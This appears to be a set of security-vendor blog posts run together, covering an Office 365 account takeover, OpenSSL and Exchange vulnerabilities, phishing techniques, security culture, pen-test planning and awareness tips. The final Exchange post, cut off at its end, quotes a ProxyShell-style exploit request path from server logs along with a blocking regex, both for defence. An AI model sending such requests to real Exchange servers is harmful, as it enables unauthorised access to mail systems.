Protecting Microsoft Office 365 from Cyberattacks

By: Mark Sangster, VP, Chief of Strategy, and Will Ledesma, Director of Managed Detection and Response

Cloud adoption is universal, as is the move to SaaS applications like Microsoft Office 365 (O365). Cloud architecture simplifies management while increasing business access and collaboration. Yet, the open and available nature of tools like O365 expands your threat profile. Cybercriminals are adept at exploiting these systems, often called Living Off The Land (LOTL). Adopting services like O365 only reinforces the notion that the threat landscape is an ever-moving sea of dunes that provide cover for criminals to move undetected and easily infiltrate your business.

As you migrate to Office 365 (amongst other SaaS applications) and increase user access, does it come at a cost? Are you losing security protection? This post discusses the move to Office 365, the risks, and ways to secure your SaaS applications from cyber threats.

Office 365 Overview

In the following blog, when Office 365 is mentioned, we are referring to the collection of Microsoft web applications and cloud-based services¹. It includes Outlook, OneDrive, Microsoft Teams, and Microsoft Office (Excel, Word, and PowerPoint). These services further integrate with Microsoft Exchange Server, SharePoint, and others. Authentication is driven via Hybrid Azure configurations or full Azure Active Directory Server integration. Adlumin’s platform ingests the various logs produced by these applications, servers, and authentication services.

Real Threats in the O365 Trenches

Today’s IT (Information Technology) open and accessible infrastructure means companies cannot turn a blind eye to threats lurking in plain sight. Cybercriminal groups such as Gootloader actively seek and exploit Office 365 vulnerabilities.

Like other SaaS applications, Office 365 contains mission-critical, often confidential, and damaging information if exposed through unauthorized channels. Proprietary intellectual property, business plans, customer contracts, and financial data are stored and shared through Office 365. Cybercriminals are attracted to any source of critical assets, and the open nature of Office 365 creates double jeopardy in terms of cyber threats.

Add to that the complexity of any expansive ecosystem of services and applications, and it is no wonder the Office 365 family has a plethora of known vulnerabilities² that exploit services, including remote code execution, spoofing, bypassing controls, and information exposure.

Threat actors will look to identify any way into a system. Many use password spray techniques, while others attempt phishing tactics. Regardless of the vector, every attack angle must be observed.

Many of these exploits are easy for criminals to deploy. For example, Microsoft modified Azure authentication protocols to prevent unauthorized parties from intercepting or spoofing authentication requests, harvesting credentials and then passing these credentials to the Azure servers to complete the user’s login request³.

Office 365 Login

Convincing phishing emails that launched customer-branded log-in portals left the user unaware of the fraudulent nature of the act. And the successful sign-on offers no signs of suspicious or at least unexpected behavior.

Most organizations rely on Single Sign-On (SSO) servers to authenticate users. At the same time, they have been deployed for their simplicity and ease of use, and adversaries tailgate on these advantages to gain initial access to organizations.

Let’s dive into a real-world example that Adlumin’s Managed Detection and Response (MDR) team discovered. The Adlumin platform alerted on suspicious activity in the form of impossible travel, which is the notion that a user cannot log in from two geographical locations in a period in which they could not physically traverse. The adversary leveraged an older vulnerability against Oauth 2.0 that exploits cloud Azure authentication server misconfiguration. The threat actor was able to take ownership of the targeted account but was rapidly stopped by Adlumin.

Adlumin’s investment in machine learning algorithms solves the conundrum of analyzing the enormous volume of logs generated by O365 services and serves in this class of exploit. False positives are eliminated, and vetted alerts and events are presented to MDR analysts for complete analysis and containment.

Take the previous example of impossible travel authentication. A user cannot log in from New York and London at the same hour, but Microsoft load balancing might send an authentication request from a New York user to a server in London, given current Internet traffic. On the surface, the concurrent login looks suspicious, but it is not. Additional contextual information allows one to confirm the event and determine if it is malicious.

In this case, User and Entity Behavior Analytics (UEBA) solve this dilemma. UEBA baselines normal user and device activity and flags anomalies. Where does the user normally log in from? What are the normal behaviors of the user? What machine do they typically use? Adlumin UEBA paired with our MDR analysis provides a Zero Trust approach to identify the outliers, investigate, and contain them. It is about identifying threats before they turn into business-disruptive incidents.

With Microsoft SSO, attackers have a single portal to a world of applications: OneDrive, SharePoint, emails, confidential information, etc. Access to these systems additionally provides a vector for distributing malicious binaries like ransomware to other users and systems.

Alert and Response Example:

Adlumin’s MDR team has several containment actions. In this case, the analyst disabled the user account and implemented a firewall IP block via Adlumin’s SOAR (Security Orchestration, Automation, and Response) to provide machine-to-machine invoked protection actions.

The Alert

Alert in details showcasing the impossible actions:

A machine learning algorithm detected Office 365 activity originating from an anomalous

The Adversary’s Actions

The first move:

Once the adversary gains access, they set up a forwarding rule against an admin account.

Suspicious inbox forwarding rule\

The second move:

The adversary then looks for and collects an expense report.

collects an expense report

The third move:

In this case, the client had disabled automatic blocks against suspicious activity, including the compromised account, remote access, and source IP blocking. In response, Adlumin’s MDR team takes containment actions:

Security Orchestration Automation and Response (SOAR)

IP blocks were also implemented via SOAR:

IP blocks were also implemented via SOAR

At this point, the initial attack is contained. Adlumin’s MDR team continued to monitor for further intrusions against the customer.

Take Aways

Today’s risk equation includes sophisticated threat actors, growing accountability and compliance requirements, and the protection of emerging technology. Office 365 is not new, but attacks against SaaS applications will continue to grow. The pandemic shifted much of the global workforce to a remote model.

Distributed (cloud) storage, remote access, and expanding user privileges have created new challenges for system administrators. They can no longer control access through on-premises services and restricted devices. In the battle to protect your business from cyberattacks while moving with technology trends, Adlumin provides the confidence you need to adopt and protect emerging technologies and services like Office 365.

  1. https://en.wikipedia.org/wiki/Microsoft_365
  2. https://www.cvedetails.com/vulnerability-list/vendor_id-26/product_id-80308/Microsoft-365-Apps.html
  3. https://docs.microsoft.com/en-gb/microsoft-365/admin/setup/customize-sign-in-page?view=o365-worldwide

New Vulnerabilities Affecting OpenSSL: What you Need to Know

On Tuesday, November 1, 2022, OpenSSL made public two vulnerabilities affecting the most recent versions of the OpenSSL 3.x branch¹. The pair of Common Vulnerabilities and Exposures (CVEs), CVE-2022-3602 (Remote Code Execution) and CVE-2022-3786 (Denial of Service) – sometimes known as “Spooky SSL,” have been patched in the most recently released OpenSSL version, 3.0.7, but remain a potentially significant vulnerability if left unpatched. The severity of these vulnerabilities is exacerbated by the many ways and products OpenSSL is used in.

OpenSSL is a widely popular library used across operating systems, software suites, and packages to provide a basis for establishing secure and encrypted communications sessions. It is commonly used by applications such as Web Servers to establish HTTPS/TLS secured communications, VPNs, and other applications requiring secure sessions such as encrypted mail protocols.

The National Cyber Security Centrum – Netherlands (NCSC-NL) has released a public repository cataloging operating systems and software which use the vulnerable OpenSSL versions². The list is non-exhaustive but provides a good basis for recognizing what types of systems the OpenSSL vulnerabilities intersect with.

CVE-2022-3602 – Remote Code Execution Vulnerability

CVE-2022-3602 is a potential Remote Code Execution (RCE) vulnerability, which may allow unauthorized execution of malicious code on remote systems, either servers or clients using the affected OpenSSL libraries ³. A buffer overrun can be triggered during the verification of the X.509 certificate’s name field, leading to a potential crash (Denial of Service / DOS) or RCE. The overflow happens after the certificate chain signature is verified. Therefore exploitation requires that either a Certificate Authority (CA) has signed the malicious certificate or the application using the OpenSSL library continues certificate verification despite certificate trust failure.

Usage of this CVE has not yet been observed in the wild; however, the timely patching of affected systems is recommended as the best course of action.

CVE-2022-3786 – Denial of Service Vulnerability

CVE-2022-3786 is also a buffer overrun in X.509 certificate name constraint checking ⁴. Attackers can leverage the vulnerability by crafting a malicious email address in the certificate to cause an overflow of an arbitrary number of bytes in memory by using `.’ character (decimal 46). This buffer overflow can result in a crash, causing a denial of service. The vulnerability can affect both OpenSSL provided TLS clients and servers, clients being potentially exploited by connecting to a malicious server and servers being vulnerable to malicious client connections when requesting client authentication.

Like the previous vulnerability, this CVE has not been observed in the wild, but it is recommended that businesses, administrators, and users patch to the latest version of OpenSSL.

Recommendations

Adlumin recommends that all users of OpenSSL and OpenSSL backed software update to the latest versions available in their major branch, especially if leveraging version 3.x.

Additionally, we recommend using a vulnerability management product to regularly scan your environment to identify vulnerabilities and misconfigurations. Adlumin also recommends using the business’s SIEM product to continually search and alert for suspicious executions which may be a result of the exploitation of the vulnerability.

Resources

  1. OpenSSL. (2022, November 1). OpenSSL Security Advisory [November 1 2022]. https://www.openssl.org/news/secadv/20221101.txt. Retrieved November 1, 2022, from https://www.openssl.org/news/secadv/20221101.txt
  2. NCSC-NL. (2022, October 28). OpenSSL-2022/scanning at main · NCSC-NL/OpenSSL-2022. OpenSSL-2022. Retrieved November 2, 2022, from https://github.com/NCSC-NL/OpenSSL-2022/tree/main/scanning
  3. MITRE. (2022, November 1). CVE-2022-3602. CVE. Retrieved November 1, 2022, from https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3602
  4. MITRE. (2022, November 1). CVE-2022-3602. CVE. Retrieved November 1, 2022, from https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3602

Six Phishing Techniques and How to Fight Them

By: Krystal Rennie, Director of Corporate Communications, and Brittany Demendi, Corporate Communications Manager

Recently, we took a 360-degree view of phishing to examine various attacks and how harmful they can be to businesses. This blog will zoom in on a subsection of those attacks and learn more about six specific methodologies behind phishing.

You might already know that phishing attacks are increasing in popularity, and cybercriminals are finding new creative ways to strike. If you have had access to an email, phone, or social media account in the last decade, you have most likely been exposed to a phishing attempt.

When most people think of phishing, they think of email. This is often reinforced by awareness training and testing programs that disproportionately cover email-based campaigns. Unfortunately, this emphasis often neglects to consider other forms equally effective as tricking recipients into surrendering confidential information.

Phishing.org gave a highlight of popular phishing techniques, and below is a quick rundown of a few popular methods:

#1: Email

Email is the most common form of phishing, and it occurs when cybercriminals often send emails with phishing URLs to collect sensitive information. According to a Forcepoint article, “an email may present with links that spoof legitimate URLs; manipulated links may feature subtle misspellings (double “nn”s replace a “m” or uppercase “i” replaces lowercase “l”) or use of a subdomain.” Once access is gained through these links, criminals can successfully launch an attack.

More sophisticated email phishing uses infected attachments and contains evocative content encouraging recipients to open the attachment, automatically downloading malicious code. These emails can use positive messages, such as prizes or hefty discounts, or negative ones, such as complaints or lawsuits. They often appear to come from an authority to add weight to the recipient’s need for immediate action.

# 2: SMS and Text Messages

SMS and Text Messages are utilized when cybercriminals use text messages to target individuals to get them to disclose personal information via a link that would lead them to a phishing website and expose their information to the attacker.

During the early stages of Covid and work-from-home measures, executives were targeted through their assistants who received fake text messages from their boss. These themes often involved the fake boss reporting a stolen device, a new phone number, and an email. Once a persistent connect was made, the criminals would ask for confidential information in the hopes the assistant would surrender it over text.

# 3: Web-based forgery

Web-based forgery is a very sophisticated phishing techniques, as it uses fake websites to fool users. According to Phishing.org, this technique is “also known as ‘man-in-the-middle,’ the hacker is located between the original website and the phishing system. The phisher traces details between the legitimate website and the user during a transaction. As the user continues to pass information, it is gathered by the phishers, without the user knowing about it.”

One ransomware gang used fake Microsoft Office 365 log-in prompts to collect credentials and then passed the legitimate log-in information to Microsoft servers to complete the log-in creating a seamless and expected transaction. The victims were oblivious to the credential scrape.

# 4: Malvertising

Malvertising involves malicious advertising with active scripts created to download malware or force undesired content into your networks. The most common and popular methods of malvertising include Adobe PDFs and Flash. You should steer clear if you have seen these advertisements pop up on your browser.

# 5: Content Injection

Content Injection occurs when the cybercriminal maliciously alters a portion of content hosted on a reliable website. This will mislead the user and make them go to a page that leads them outside their intended website. Once they land on that redirected page, they will be asked to enter personal information.

The criminal group, Gootloader, used this technique to solicit the credentials of executives and professionals looking for templates, tools, and other planning resources.

# 6: Keyloggers

Keyloggers use a specific kind of malware to recognize and record (or log) user keyboard input. The information collected is sent to cybercriminals so that they can decipher passwords and gain access to other types of personal information.

In one case, criminals used keystroke loggers to tailgate financial transactions and stole $1.9 million from a tech start-up in 24 hours. The money was moved to banks in China, Russia, and Turkey and was never recovered.

The first step to protecting yourself and your organization from falling victim to these phishing techniques is learning to spot them, which can be done through consistent training. In other words, by implementing a Proactive Defense Program. As we know, knowledge is power. Teaching employees to feel confident in their ability to report a phishing scheme can be the difference between temporarily shutting down operations, an organization folding, and conducting business as usual. The advantages and benefits are endless, educating employees on how to recognize cyber threats, the types out there, and what actions to take when they encounter one.

It is evident that IT staff already carry a heavy load, so many turn to third-party services to implement and manage security awareness testing and training. These pieces of training deliver real-world scenarios and context-rich security awareness programs in line with the organization’s security operation center services. So, what can an organization expect from a Proactive Defense Program?

How to Combat Phishing Techniques

The first step to protecting yourself and your organization from falling victim to these phishing techniques is learning to spot them, which can be done through consistent training. In other words, by implementing a Proactive Defense Program. As we know, knowledge is power. Teaching employees to feel confident in their ability to report a phishing scheme can be the difference between temporarily shutting down operations, an organization folding, and conducting business as usual. The advantages and benefits are endless, educating employees on how to recognize cyber threats, the types out there, and what actions to take when they encounter one.

It is evident that IT staff already carry a heavy load, so many turn to third-party services to implement and manage security awareness testing and training. These pieces of training deliver real-world scenarios and context-rich security awareness programs in line with the organization’s security operation center services. So, what can an organization expect from a Proactive Defense Program?

  1. Train employees internally for security threats in your industry

    • Phishing campaigns are built with themes that imitate real-world phishing email styles quarterly, attempting to entice employees to browse an unknown website or open an infected attachment, the campaign targets employees with privileged access or that perform critical functions. The mock phishing emails expose high-risk users and an organization’s vulnerabilities. Specific employee emails are tracked with their campaign results.
  2. Monitor training and test for understanding of key security concepts

    • a. Following each quarterly phishing campaign exercise, on-demand training is set up for all employees. Enrollment notifications are sent to all users to track their completion activity and notify them if they still need to complete their training. It is suggested to customize training content.
  3. Implement additional security training by a third-party expert

    • A third party will take responsibility for implementing and setting up Security Awareness Training to ensure the organization can comply with its industry regulations and set policies. In addition, organizations can upload company-specific policies. Employees are assigned the policies and must agree to or acknowledge to develop policies to complete their training. Required training supports vertical and segment framework, which includes:
    • Sarbanes- Oxley reporting requirements
    • NIST
    • HIPAA (Health Insurance Portability and Accountability Act of 1996)
    • ISO
    • PCI (Payment Card Initiative)
    • FFIEC CAT
  4. Remediate non-compliant employees with security awareness testing

    • High-risk users who open an attachment, click a link or fail a phishing email campaign should be required to attend remedial training campaigns. These campaigns include additional programs to help empower them with more practice and knowledge. In addition to tailored and informed training suggestions based on the campaign results.
  5. Continuous training that has a repeatable process

    • Working with a third-party service gives an organization dedicated experts to manage all aspects of delivering campaigns, collecting the results, and reporting on employee activity to support awareness training and recommendations.Implementing security awareness has become a must-have within every organization, regardless of industry. These services solve the human element in cybersecurity by educating employees and properly training them to report suspicious activity by requiring them to agree or acknowledge to set policies to complete training.

To Learn More:

Six Popular Phishing Techniques and How to Combat Them is a part of Adlumin’s Cyber Blog content series. For more information about how your organization can protect itself from cybercriminals, browse more from our knowledge-rich series here.

Or contact our experts if your team is ready for a demo of Adlumin’s Managed Detection and Response Plus Platform extended risk management and security services.

Building a Cybersecurity Culture

Cybersecurity is an ecosystem of skills, experience, backgrounds and perspectives. According to Cybersecurity Ventures, “Over the eight-year period tracked, the number of unfilled cybersecurity jobs is expected to grow by 350 percent, from one million positions in 2013 to 3.5 million in 2021. And of the candidates who are applying for these positions, fewer than one in four are even qualified, according to the MIT Technology Review.” The last few years have taught us many things, but most of all, it has taught us how much our society depends on technology.

As a result, cybersecurity has become one of the most fast-paced and in-demand industries over the past year. And with greater demand comes greater responsibility. This blog will explore why redefining cybersecurity careers can benefit the industry’s future and what makes IT professionals vital within every organization.

Cybersecurity Culture

Cybersecurity Culture is essential to organizational resilience to reduce the risk associated with human error. Human error is considered the number one reason for data breaches. Yet as aircrash investigation veteran Sidney Dekker writes in his book, The Field Guide to Understanding Human Error, “when we blame the people, we miss the chance to learn.”

Thus, cybersecurity culture needs to be a part of a broader corporate culture of daily actions encouraging employees to make mindful decisions that align with security policies, industry obligations and commitments made to customers. This involves breaking misconceptions about cyber attacks, providing business context (the why it matters), and offering the skills to identify threats and report them.

For example, the COM-B model is the bedrock of behavioral change. The model proposes that all three components (COM) are required to drive B, behavioral change:

  • Capabilities: Can the desired behavior be accomplished?
  • Opportunity: Is there sufficient opportunity for the behavior to occur?
  • Motivation: Is there sufficient motivation for the behavior to occur?

The COM-B model is applied in critical industries like trauma medicine and is designed to push employees to automated, reflective response when facing a stressful situation, rather than panic or ignore the evidence.

By teaching and implementing proper precautionary actions like understanding the benefits of using a password manager and dispelling existing myths around password manager security and ease of use could help employees understand the role they play in protecting themselves and your organization’s security.

IT Professionals Lead the Way

As cybercrime rises and the threat landscape continues to shift like dunes in desert and the responsibily to adapt often falls on IT professionals. However, all employees must adapt to this changing landscape and remain vigilant. One of the best ways for an organization to mitigate cybercrime and risk is to build a culture of cybersecurity.

Far too many business leaders fail to understand the risks posed by cyber threats, and it falls to the IT professions to build a business case and convince the non-technical stakeholders of the need in addition to securing resourcing and implement programs.

When it comes to buildng the case for a security culture, technical leaders must shift the conversation from the “ones and zeroes” of IT security to the “dollars and cents” of Finance leadership, or the “nuts and bolts” of Operations. A security culture should be measured in terms of business benefits and not simply the number of trained employees.

Proactive Cybersecurity Approaches

Many IT departments work with third-party companies to implement a Proactive Defense Program. This benefit is that IT professionals can put their efforts towards other duties needed within their organization and foster a security culture. A security culture is more than just awareness. It requires employees to learn from IT professionals what security risk entails and the process to avoid it. It is building and enforcing operating processes of tasks that keep an organization safe.

A Proactive Defense Program is a fully managed security awareness training and testing service designed to reduce the risk posed by the human component. It empowers employees with the knowledge and skills to identify and report suspicious activity using real-life de-weaponized attack campaigns. All results are tracked through a Managed Detection and Response Platform. This allows IT professionals to view every employee’s analytics, program reports, and performance.

The type of culture that IT professionals build directly impacts every organization’s success. If security is not a part of every department, it will likely fail. IT professionals already carry the heavy weight of ensuring an organization is secure, so why not hold every employee accountable for their actions?

Investing in IT Security Professionals

If we are going to have a chance at changing the narrative and creating thriving cybersecurity careers, companies need to invest in their employees. Here are a few tips to consider:

IT Recruting Seek Partnerships

Seek Partnerships: : Partner with community organizations, high schools, and non-profit businesses to bring IT programs to minority students and individuals seeking to learn more about the industry. This will create access to resources that offer support and industry knowledge to diverse candidates as they prepare to enter the cybersecurity field at different stages. Providing resources to those who might not have direct access is a prominent way to expand an IT professional’s experiences and skillsets.

IT Recruiting Offer Training Programs

Offer Training Programs: Invest in programs that update your employees on the latest cybersecurity skills, threats, and tools. Offering certificate programs or other incentives for completed trainings will encourage them to participate.

IT Recruiting Review Job Descriptions

Review Job Descriptions: When writing job descriptions, really consider what skill sets are needed for a professional to thrive in the role entirely. Setting realistic expectations for different job levels is the best way to ensure that opportunities are available to rookies and vets, regardless of background or experience.

Measure What Matters to Cybersecurity

When it comes to demonstrating the value of Cybersecurity culture, it’s about measuring behavioral change and business-impacting outcomes, rather than the traditional focus on learning metrics. According the Kirkpatrick Model of Leveraging and Vallidating Talent Inverstments, there are four level:

Level 1: Reaction

  • Subjective feedback forms (“smiley sheets”) to assess learner engagement, instructor performance and content usability or format.
  • Passive metrics collected from online learning systems

Level 2: Learning

  • OPEN/CLICK rates measure detection based on Inbox preview data
  • SURRENDER rates measure user credentials given over
  • LEARNING metrics (% or # trained and pass/fail metrics)

Level 3: Behavior

  • REPORT rates measure number of suspicious lures reported using mechanism
  • ENGAGEMENT rates measure subsequent communications with Security team
  • POLICY/COMPLIANCE rate measures number of policy violations

Level 4: Outcomes

  • Losses to fraudulent financial transfers
  • Losses based on cyberattacks or Data breach costs
  • Operation savings based on optimizations or reduced workload

When it comes to reporting, focus on the top two levels. The first two are interesting but are poor proxies for outcomes. Understanding the business impact will motive the C suite and thus create a continuous cycle of security culture from the top.

Accessibility and education are vital pieces of the puzzle to consider when creating a more inclusive industry of high-functioning IT professionals. While the three tips above are not a complete solution, they are a great place to start. Remember, the most significant change begins internally, and once the groundwork is laid, the external results reflect the process. To change the narrative, we all must change ourselves, thoughts, ideas, and perceptions and think of the bigger picture. After all, baby steps are still steps.

Four Critical Areas for Planning a Penetration Test

By: Kevin O’Connor, Adlumin – Director of Threat Research

What is Penetration Testing?

Penetration Testing (Pen Testing) is evaluating the security of a system by attempting to breach the system’s confidentiality, integrity, or accessibility. In other words, it is known as ethical hacking. Standard penetration testing puts a Red Team, one built of skilled mock-attackers, which takes arms against a network and its assets, attempting to achieve an objective such as access to a company’s internal emails. These simulated attacks are completed while hopefully remaining undetected by network administrators and security staff. The security objective of a penetration test is to check the system’s security and uncover potential weaknesses that real attackers might exploit to compromise the business and its assets.

Pen tests can be a valuable tool in a security professionals toolkit and can show how components of a layered security defense work – or fail together

Other penetration testing types include black box security testing, where attackers attempt to access a single system without forewarning information about its design, interfaces, and security. Black Box testing scales through Grey Box, where some information is known or provided, to White Box testing, where all documentation about the system and its security is given to the attackers. The ways a penetration test can be conducted are as varied as the network architectures, services, and systems implemented in a network.

Black Box Security Testing

I have been involved in dozens of penetration tests and similar activities. From my experiences, I have learned that there are a few focus areas where putting in extra care during planning can make the penetration test more successful and applicable to the business.

A successful penetration test will inform stakeholders, such as system owners, administrators, security staff, and management, if there are paths under the current business operating environment that might lead to potential exploitation and compromise. The penetration test results should specify which systems were tested, how they were tested, and what assumptions or dependencies were required when completing the test. An effective penetration test will allow the business to implement technical solutions to mitigate threats and show vulnerabilities in their operations, administrative, and security processes, which can be enforced or updated to lower the risk or damage of compromise.

4 Critical Focus Areas

Penetration Testing focus areas

Goal

The goal of a penetration test should be established before scoping out the test’s boundaries, although there is often circular feedback between the two activities. Setting a plan for the penetration test is critical in ensuring that the test provides valuable and actionable feedback and is working to testify to the security of a tested system. Without a well-scoped goal, any potential breach by the mock attackers could be considered a successful penetration of the business. However, if the business is trying to test the security of its account credential management system – the attackers gaining access to a single external web application does not speak much about the security of the account credential management system.

Businesses should also ensure that the goal is focused and specific. Broad goals such as ‘access to the business’ or proof of lateral movement capability against a network potentially test multiple systems and environments. The management of these systems may span several internal business groups, some of which may fall outside the test’s scope (see below). While there is value in testing managed security across business groups – this needs to be carefully considered when establishing stakeholders and participants for the test.

A good pen test goal would be trying to answer a specific security question such as; is some external web application secure, can we catch during logging, auditing, and accounting the creation of new malicious accounts in the domain, or can an attacker move laterally from an external DMZ to internal account management systems?

Scope

A penetration test’s scope is complimentary to its goal. Defining the scope can be a circular process involving a review of interdependent systems needed to reach the goal potentially. During scoping of the penetration test, it’s essential to try and identify which systems and teams may be involved in the test so that all potential stakeholders are aware, buy-in, and will act on the test’s results.

A well-defined scope is also critical for ensuring that the penetration test isn’t disruptive to business activities. Considerations such as:

  • Is the test performed against live business function support systems or against development and testing systems?
  • Is it within scope for the mock-attackers to interact or interface with a certain business or security-critical systems?
  • Can attackers modify data or configurations on compromised hosts to cover their tracks or better enable completion of the test’s goal?
  • Can the attackers leverage and exploit physical access to network assets to assist in compromise?

These questions are important areas to outline during penetration test scoping and will impact the value of your test results.

To help with scoping out the penetration test SANS has a worksheet that covers the basic areas to help with scoping.

Adversary Simulation

Something not often considered in penetration testing is the need and benefits of Adversary Simulation. Adversary simulation conducts the penetration test using the assumed Tactics, Techniques, and Procedures (TTPs) of a known or fictionalized threat actor group. In mimicking the capabilities of a real group or set of threats, the penetration test can be scaled to a level of attacker sophistication that mimics the assumed threat against the system being tested.

Something I am proud of as a security professional at Adlumin – is that our penetration testing capabilities allow us to select defined and known Threat Actors, such as APTs or specific e-Crime groups, and then mimic their capabilities during our testing. Adlumin can also define custom threat actor profiles, mapping the capabilities and TTPs used in a pen test to the MITRE-ATTCK framework and specific techniques such as sets of exploits, malware, lateral movement strategies, and communication types. This allows us to conduct a tailored exploitation campaign that factually represents real and current threats.

Part of IT Risk Management is the concept that the risk to an information system is directly related to the threats against the system. In the case of pen testing, it helps to symbolize the threat as the set of known threat actors and their associated capabilities. If a business isn’t in an industry known or expected to be targeted by a specific APT group, that group isn’t considered a significant threat against the business network. Such groups would lack the motive in the Motive, Opportunity, and Means (MOM) analysis methodology, and the value of mimicking such a group’s TTPs in the pen test is more limited. We can extract the most value from a pen test by simulating applicable threats and only mixing TTPs utilized between threats when we’ve acknowledged that such an exploitation path isn’t currently known, used, or likely—for example, assessing the threat against compromising a business’s internal email system.

Reviewing Results

Understanding the results of the penetration test and its findings is key to accomplishing the well-scoped goal. Integrating the test’s findings needs to go beyond patching leveraged vulnerabilities or systems and expand to understand why the vulnerability wasn’t known, why exploitation wasn’t observed, and if it was, why wasn’t an alert triggered or taken? What steps in the organization’s IT Security process need to be adjusted, better adhered to, monitored, or controlled with automation and fail-safes?

When reviewing a penetration test, you should consider questions such as:

  • Did the attackers complete their objectives, and how far did they get?
  • What vulnerabilities, exploits, and paths of access were used?
  • Were any related events logged in any security systems?
  • Does the business have observability of the events?
  • Why didn’t logged events generate a security alert?
  • Why wasn’t any alerting escalated to help prevent a further attack?

As you can see, a lot goes into setting up and planning for a successful penetration test. Pen tests can be a valuable tool in a security professionals toolkit and show how layered security defense components work – or fail together. Adlumin offers penetration testing services and can work with your organization to help create well-scoped goals and help you understand where in the gap between exploitation and data exfiltration your security – and, importantly, processes, can be improved to strengthen business security.

References

Ken van Wyk, C. C. M., & Radosevich, W. (2013, July 31). Black Box Security Testing Tools. CISA. Retrieved September 10, 2022, from https://www.cisa.gov/uscert/bsi/articles/tools/black-box-testing/black-box-security-testing-tools

Poston, H. (2021, June 17). What are Black Box, grey box, and white box penetration testing? [updated 2020]. Infosec Resources. Retrieved September 10, 2022, from https://resources.infosecinstitute.com/topic/what-are-black-box-grey-box-and-white-box-penetration-testing/

Wright, J. (2020, November 6). Joshua Wright. SANS Worksheet. Retrieved September 12, 2022, from https://www.sans.org/posters/pen-test-scope-worksheet/

Raising Awareness Through Cybersecurity Awareness Month (CAM)

By: Cybersecurity & Infrastructure Security Agency (CISA)

It’s October, so we are officially kicking off Cybersecurity Awareness Month (CAM). The annual initiative, driven by the Cybersecurity & Infrastructure Security Agency (CISA), is dedicated to raising awareness about the importance of prioritizing cybersecurity. This year’s overarching theme is “See Yourself in Cyber,” encouraging us all to see the roles we play in cybersecurity actively.

Cybersecurity has become one of the biggest hot topics inside and outside technology circles over the last two years. From securing learning devices due to a rise in digital learning during the COVID-19 pandemic to coping with the fallout of high-profile breaches of national infrastructure such as the Colonial Pipeline, there is a seemingly endless news cycle dedicated to cybersecurity mishaps and concerns.

And with this onslaught of negative news, it can be easy for everyday individuals to become overwhelmed and feel powerless in the face of the “insurmountable” threats posed by cybersecurity. But in actuality, nothing could be further from the truth.

With all the jargon typically thrown around in cybersecurity, there is a longstanding misperception that cybersecurity is beyond everyday people and that it should be left to professionals. Moreover, there is a prevailing sense among the public that breaches are simply a fact of life and that we should just learn to deal with them. But this just isn’t true. In fact, everyday people have a huge role to play in cybersecurity threat prevention, detection, and remediation. For example, according to IBM, 95% of breaches have human error as a main cause. Therefore, everyday day technology users are very much the first line of defense when it comes to thwarting cybercrime. Unfortunately, though, many individuals are not aware of some of the best practices for boosting cybersecurity and how easy they are to use.

With that, here are a few key best practices that everyday people can implement today to enhance their own cybersecurity and create a more secure world for everyone.

  1. Watch Out for Phishing

    Phishing – when a cybercriminal poses as a legitimate party in hopes of getting individuals to engage with malicious content or links – remains one of the most popular tactics among cybercriminals today. In fact, 80% of cybersecurity incidents stem from a phishing attempt. However, while phishing has gotten more sophisticated, keeping an eye out for typos, poor graphics, and other suspicious characteristics can be a telltale sign that the content is potentially coming from a “phish.” In addition, if you think you have spotted a phishing attempt, report the incident so that internal IT teams and service providers can remediate the situation and prevent others from possibly becoming victims.

  2. Update Your Passwords and Use a Password Manager

    Having unique, long, and complex passwords is one of the best ways to boost your cybersecurity immediately. Yet, only 43% of the public say that they “always” or “very often” use strong passwords. Password cracking is one of the go-to tactics that cybercriminals turn to in order to access sensitive information. And if you are a “password repeater,” once a cybercriminal has hacked one of your accounts, they can easily do the same across all of your accounts.One of the biggest reasons that individuals repeat passwords is that it can be tough to remember all of the passwords you have. Fortunately, by using a password manager, individuals can securely store all of their unique passwords in one place. Meaning people only have to remember one password. In addition, password managers are incredibly easy to use and can automatically plug in stored passwords when you visit a site.

  3. Enable MFA

    Enabling multi-factor authentication (MFA) – which prompts a user to input a second set of verifying information such as a secure code sent to a mobile device or to sign in via an authenticator app – is a hugely effective measure that anyone can use to reduce the chances of a cybersecurity breach drastically. In fact, according to Microsoft, MFA is 99.9 percent effective in preventing breaches. Therefore, it is a must for any individual that is looking to secure their devices and accounts.

  4. Activate Automatic Updates

    Making sure devices are always up to date with the most recent versions is essential to preventing cybersecurity issues from cropping up. Cybersecurity is an ongoing effort, and updates are hugely important in helping to address vulnerabilities that have been uncovered as well as in providing ongoing maintenance. Therefore, instead of trying to remember to check for updates or closing out of update notifications, enable automatic update installations whenever possible.

New Unpatched Microsoft Exchange Vulnerabilities - Remote Code Execution Vulnerabilities Allowing Potential Attacker Access

By: Director of Threat Research, Kevin O’Connor

Microsoft has confirmed a new pair of unpatched vulnerabilities affecting its Exchange mail server platform. Tracked as CVE-2022-41040 and CVE-2022-41082, Microsoft validated the exploits’ existence and confirmed they are actively being used in the wild by malicious actors to compromise systems. This vulnerability is believed only to affect on-premises instances of Microsoft Exchange contained in Microsoft Windows Server 2013, 2016, and 2019, and not cloud-based Microsoft O365 mail applications and services such as Exchange Online, which Microsoft attests has detections and mitigations already in place. Microsoft Exchange Online customers do not need to take any action.

What you Need to Know

Microsoft does not currently have a patch available for the vulnerabilities but recommends that on-premise Microsoft Exchange customers should review and apply URL Rewrite Instructions and block exposed Remote PowerShell Ports. A guide by Microsoft for adding the blocking rule can be found here.

Add A Blocking Rule

  • Open the IIS Manager.
  • Expand the Default Web Site.
  • Select Autodiscover.
  • In the Feature View, click URL Rewrite.
  • In the Actions Pane on the right-hand side, click Add Rules.
  • Select Request Blocking and Click OK
  • Add the following string and click OK:
    • .*autodiscover\.json.*\@.*Powershell.*
  • Expand the rule and select the rule and click Edit under Conditions
  • Change the condition input from {URL} to {REQUEST_URI}

Blocking PowerShell Ports

Block the following ports used for Remote PowerShell

HTTP: 5985

HTTPS: 5986

The pair of CVEs are Server-Side Request Forgery (SSRF) (CVE-2022-41040) and Remote Code Execution (RCE) (CVE-2022-41082) vulnerabilities. The SSRF vulnerability can only be used by authenticated attackers suggesting that credentialed or other authorized access is needed to exploit the system. The SSRF vulnerability can then be used to enable the usage of the RCE vulnerability.

The vulnerabilities were uncovered by GTSC, a Vietnamese security company, during monitoring and incident response services in live networks. GTSC detected exploit requests in ISS logs with the same format as the previous 2021 ProxyShell RCE vulnerability:

autodiscover/autodiscover.json?@/&Email=autodiscover/autodiscover.json%3f@

